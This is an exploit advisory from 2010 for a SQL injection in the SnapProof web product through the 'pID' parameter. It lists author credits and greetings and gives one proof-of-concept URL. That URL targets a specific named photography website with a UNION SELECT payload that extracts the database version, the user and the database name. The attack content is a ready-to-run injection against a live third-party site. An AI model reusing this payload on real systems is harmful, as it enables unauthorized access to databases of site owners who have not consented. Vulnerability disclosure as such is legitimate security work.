#################################################################
# Exploit Title:  SnapProof SQL Injection Vulnerability
# 
# Date: 29th july 2010
# 
# Author: Dinesh Arora
# 
# Critical:high
#
# Product : Commercial
# 
# 
# Sample Affected Parameter: pID
#
# contact: dinesh.dinoo@gmail.com
#  
# Greetz to :b0nd, Fbih2s,Beenu,Charles ,j4ckh4x0r, punter,eberly
# 
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
#
# POC: http://www.szokephoto.com/page.php?pID=143+and+1=2+union+select+concat(version(),0x3a,user(),database()),2,3,4--
#
#  
##############################################################################